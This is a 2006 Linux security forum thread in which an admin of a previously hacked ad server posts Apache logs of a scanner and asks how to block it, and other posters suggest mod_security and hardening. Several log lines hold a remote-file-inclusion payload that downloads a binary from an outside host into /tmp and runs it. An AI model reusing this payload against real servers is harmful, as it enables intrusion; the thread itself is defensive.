LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 07-17-2006, 11:57 PM   #1
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Rep: Reputation: 15
blocking this hacker's efforts


I recently had to rebuild a box after being hacked. I believe the exploit was run through phpAdsNew which has since been updated. I've made it a little more difficult to find this time BUT I noticed the server was SLOW to respond tonight. So I'm looking through log files. I am seeing the search for phpAdsNew files again...as well as others. This searching slowed the server down before.

How can I block access to this IP virtual host account from IPs that do not have a reverse dns lookup results, like the ISPs do for emails sent from boxes not resolving?

Since this is my ad server, and very few people need to access it by domain, can I set which port is allowed to listen for this domain in my site apache conf file? So then I can access it with the port# I assign in the URL?

Code:
mybox:~ # nslookup 211.144.142.150
Server:         216.127.136.200
Address:        216.127.136.200#53

** server can't find 150.142.144.211.in-addr.arpa: NXDOMAIN

mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-access_log
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:16 -0400] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:17 -0400] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:19 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:20 -0400] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:21 -0400] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:23 -0400] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:24 -0400] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:25 -0400] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:26 -0400] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:28 -0400] "POST /xmlrpc.php HTTP/1.1" 404 1057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:29 -0400] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.144.142.150 - - [17/Jul/2006:10:01:34 -0400] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
mybox:~ # grep 211.144.142.150 /var/log/apache2/ads-error_log
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index2.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/index.php' not found or unable to stat
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/mambo
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:16 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/articles
[Mon Jul 17 10:01:17 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/cvs
[Mon Jul 17 10:01:19 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:21 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:22 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blog
[Mon Jul 17 10:01:24 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/blogs
[Mon Jul 17 10:01:25 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/drupal
[Mon Jul 17 10:01:26 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/phpgroupware
[Mon Jul 17 10:01:27 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/wordpress
[Mon Jul 17 10:01:28 2006] [error] [client 211.144.142.150] script '/srv/www/vhosts/ads/html/xmlrpc.php' not found or unable to stat
[Mon Jul 17 10:01:30 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlrpc
[Mon Jul 17 10:01:35 2006] [error] [client 211.144.142.150] File does not exist: /srv/www/vhosts/ads/html/xmlsrv
 
Old 07-18-2006, 05:57 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607
How can I block access to this IP virtual host account from IPs that do not have a reverse dns lookup results, like the ISPs do for emails sent from boxes not resolving?
Reverse DNS means checking for PTR which means doing lookups which, just like the Apache config directive to resolve remote hostnames, will noticable slow down serving. I would focus on other measures like installing mod_security. If you're concerned mod_security alone isn't enough then you could check if running a reverse proxy in front of it all is a workable solution.
 
Old 07-18-2006, 06:15 AM   #3
nx5000
Senior Member
 
Registered: Sep 2005
Location: Out
Posts: 3,307

Rep: Reputation: 57
Quote:
How can I block access to this IP virtual host account from IPs that do not have a reverse dns lookup results, like the ISPs do for emails sent from boxes not resolving?
And then some ISP had the idea to not give their customers a PTR so that these machines can't be used for spam.
Combined with your idea, these people won't have access to your machine. Not sure it's what you want.
 
Old 07-18-2006, 02:57 PM   #4
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
is there a mod_security RPM for SuSe distro?

the host account in question is an AD server so its only going to be called by my server so it won't be blocked. SOme of my advertisers may not be able to access the admin area if they don't have reverse lookups, but I'll take that chance for now.

so how can I lock down this virtual tighter so it doesn't get exploited?
 
Old 07-18-2006, 08:29 PM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607Reputation: 3607
is there a mod_security RPM for SuSe distro?
If you can't do that simple search yourself you shouldn't be running anything anywhere.


so how can I lock down this virtual tighter so it doesn't get exploited?
Check out the LQ FAQ: Security references esp. post #6 about hardening LAMP and for instance http://www.linuxquestions.org/questi...03#post2041503 and any other thread in the Linux Security forum found by search terms like "PHP mod_security" or "PHP global" or "PHP hacked".
 
Old 07-18-2006, 08:47 PM   #6
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
thank you for your snarkiness. i did search, i did not find the suse rpm. that doesn't mean someone hasn't created or found one that hasn't made its way up the food chain yet.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
LXer: Wasted Efforts in F/OSS – Office Suites LXer Syndicated Linux News 0 01-20-2006 10:31 AM
LXer: Google gets Microsoft treatment on book search efforts LXer Syndicated Linux News 0 12-09-2005 03:40 PM
A Hacker's Poem misfit-x General 6 01-15-2004 08:50 AM
cannot remove hacker's file jupiter Linux - Security 4 09-14-2001 06:54 PM
cannot remove hacker's file jupiter Linux - Newbie 1 09-03-2001 09:01 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 07:46 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration